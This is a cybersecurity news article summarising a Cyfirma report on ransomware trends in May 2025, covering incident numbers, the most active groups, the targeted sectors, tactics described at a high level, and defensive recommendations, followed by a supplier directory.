Ransomware Trends In May 2025

Uploaded on 2025-06-23 in TECHNOLOGY--Hackers, NEWS-Cybersecurity News, FREE TO VIEW

The ransomware landscape in May 2025, as detailed by Cyfirma in their latest Tracking Ransomware: May 2025 report, reveals a 15.9% rise in global incidents from April, with 545 attacks recorded. This escalation, part of a broader upward trend - 331 incidents in 2023, 520 in 2024, and now 545 in 2025 - illustrating the growing audacity of cybercriminals.

The United States bore the brunt, with 272 victims, dwarfing Germany (31) and Canada (28), as shown in the report’s geographical analysis.

The preference for these nations reflects their wealth, data-rich enterprises, and critical infrastructure, making them ripe for high-stakes extortion. The predominance of attacks in the  U.S highlights its status as a prime target due to its economic heft and digital reliance.

Shifting Players, Evolving Tactics

The report illustrates a volatile ecosystem. Newcomers SafePay and SilentRansomGroup led with 72 and 67 attacks, respectively, eclipsing established groups like Qilin (down from 72 to 55 incidents), Play (51 to 44), and Akira (55 to 31). This shift suggests a rapid rise of agile, aggressive actors. SafePay’s meteoric ascent, with 198 victims since late 2024, relies on double-extortion tactics - encrypting systems and exfiltrating data - often via vulnerable VPNs and Remote Desktop Protocol (RDP) endpoints. SilentRansomGroup’s sudden rise to prominence may stem from a newly launched leak site, hinting at prior covert activity.

Tactically, ransomware groups are growing more sophisticated. Qilin, for instance, has adopted Rust-based coding and advanced loaders like NETXLOADER and SmokeLoader, enabling stealthy in-memory execution, as detailed in the report’s section on group evolution. A novel delivery method - ransomware embedded in JPEG images paired with decoy documents - evades detection by exploiting user trust in common file formats. The report’s analysis of the  attack chain shows a stager script activating upon image viewing, fetching the ransomware executable from a remote server.

Additionally, groups like Qilin - responsible for last year's damaging attacks on London Hospitals - and Hunters International abuse legitimate tools like Kickidler for reconnaissance, harvesting credentials without triggering alerts, a tactic outlined in the report’s technical analysis.

Industry Under Siege

The Professional Goods & Services sector faced the heaviest onslaught, with 94 incidents, followed by Consumer Goods (70) and Manufacturing (52), although the May attacks have a wide reach across finance, IT, real estate, and even less-targeted sectors like automotive and energy. Manufacturing’s vulnerability, noted in prior reports, stems from outdated software and the high cost of downtime, making it a perennial target.

The exploitation of SAP NetWeaver vulnerabilities (CVE-2025-31324) by groups like Qilin and BianLian further amplifies risks for enterprises reliant on complex software ecosystems.

High-Profile Breaches & Broader Impacts

Key events in May 2025 highlight the stakes. Germany’s doxing of Vitaly Kovalev, a ringleader behind Conti and TrickBot, exposed the organised nature of these groups, with profits in the hundreds of millions. An Iranian national’s guilty plea for RobbinHood attacks on U.S. cities, using tactics like BYOVD to disable antivirus protections, underscores the global reach of these threats. MathWorks’ ransomware attack disrupted critical services, while Kettering Health’s outage, linked to Interlock, crippled operations. The leak of VanHelsing’s ransomware builder, detailed in the report, risks spawning copycat groups, echoing past leaks like Babuk.

The business impact is stark: 31% of attacked enterprises halt operations, 40% downsize staff, and 60% of small businesses close within six months. The average cost per incident, pegged at $200,000, compounds reputational and regulatory damage, as outlined in the report’s impact analysis.

A Call for Resilience

The report’s recommendations - robust cybersecurity, employee training, and incident response planning - are urgent. As ransomware groups wield advanced tools and exploit human and technical vulnerabilities, organisations must prioritise patch management, network segmentation, and multi-factor authentication.

The May 2025 surge, driven by new players and stealthy tactics, signals a relentless threat. Proactive defence, rooted in threat intelligence and governance, is no longer optional but essential for survival against escalating cyber threats.

Image: Cyfima 

You Might Also Read: 

Recent Ransomware Attacks Have Focused On Identity Gaps:

If you like this website and use the comprehensive 8,000-plus service supplier Directory, you can get unrestricted access, including the exclusive in-depth Directors Report series, by signing up for a Premium Subscription.

  • Individual £5 per month or £50 per year. Sign Up
  • Multi-User, Corporate & Library Accounts Available on Request

Cyber Security Intelligence: Captured Organised & Accessible

 

« How Retailers Can Combat The Rising Cyberthreat
Healthcare Under (Cyber) Attack: What You Need to Know »

ManageEngine
CyberSecurity Jobsite
Check Point
Cyrin

Real Attacks. Real Tools. Real Scenarios.
Schedule a demo

Sign Up: Cyber Security Intelligence Newsletter

Directory of Suppliers

Directory of Cyber Security Suppliers

Directory of Cyber Security Suppliers

Our Supplier Directory lists 8,000+ specialist cyber security service providers in 128 countries worldwide. IS YOUR ORGANISATION LISTED?

IT Governance

IT Governance

IT Governance is a leading global provider of information security solutions. Download our free guide and find out how ISO 27001 can help protect your organisation's information.

North Infosec Testing (North IT)

North Infosec Testing (North IT)

North IT (North Infosec Testing) are an award-winning provider of web, software, and application penetration testing.

CSI Consulting Services

CSI Consulting Services

Get Advice From The Experts: * Training * Penetration Testing * Data Governance * GDPR Compliance. Connecting you to the best in the business.

CYRIN

CYRIN

CYRIN® Cyber Range. Real Tools, Real Attacks, Real Scenarios. See why leading educational institutions and companies in the U.S. have begun to adopt the CYRIN® system.

Group-IB

Group-IB

Group-IB is a leading provider of solutions dedicated to detecting and preventing cyberattacks, identifying online fraud, investigating high-tech crimes, and protecting intellectual property.

Security Research Labs (SRLabs)

Security Research Labs (SRLabs)

Security Research Labs is a Berlin-based hacking research collective and consulting think tank.

FIRST Conference

FIRST Conference

Annual conference organised by the Forum of Incident Response and Security Teams (FIRST), a recognized global leader in computer incident response.

Basis Technology

Basis Technology

Basis Technology provides software solutions for text analytics, information retrieval, digital forensics, and identity resolution.

Guardian Data Destruction

Guardian Data Destruction

Guardian Data Destruction provides a comprehensive suite of onsite e-data destruction services.

NuID

NuID

NuID is a pioneer in trustless authentication and decentralized digital identity.

ToucanX

ToucanX

ToucanX has eliminated remote attack vectors without sacrificing productivity. We’ve brought embedded near real time virtualization to the enterprise endpoint.

Fastcomcorp

Fastcomcorp

Fastcomcorp offers a world-class proactive cyber security defense and risk management consulting. Including Darkweb monitoring and posture assessments.

Gigit

Gigit

Gigit’s Service portfolio focuses on your business’ needs and the integration of comprehensive cybersecurity policies, plans, procedures, and practices into your business culture and operations.

Intracom Telecom

Intracom Telecom

Intracom Telecom is a global telecommunication systems & solutions vendor offering a complete range of professional services and solutions including Information Security.

Guardey

Guardey

Guardey protects thousands of SME's environments. Whether your team works at the office, at home, at the customer or remotely. We protect your business. We do this in an accessible and affordable way.

CyberloQ Technologies

CyberloQ Technologies

CyberloQ Secure is a cybersecurity solution that enables clients to implement highly robust Multi-Factor Authentication (MFA) that includes client-defined location-based geofencing constraints.

Incode

Incode

Incode is the leading provider of world-class identity solutions that is reinventing the way humans authenticate and verify their identities online.

Convergint

Convergint

Convergint is a service-based systems integrator working alongside a global network of partners and manufacturers to deliver a range of solutions including cybersecurity.

Norwegian Data Protection Authority (Datatilsynet)

Norwegian Data Protection Authority (Datatilsynet)

The Norwegian Data Protection Authority (Datatilsynet) is the national data protection authority for Norway.

ThreatMate

ThreatMate

ThreatMate empowers businesses with comprehensive tools to detect, protect, and remediate against cyber threats.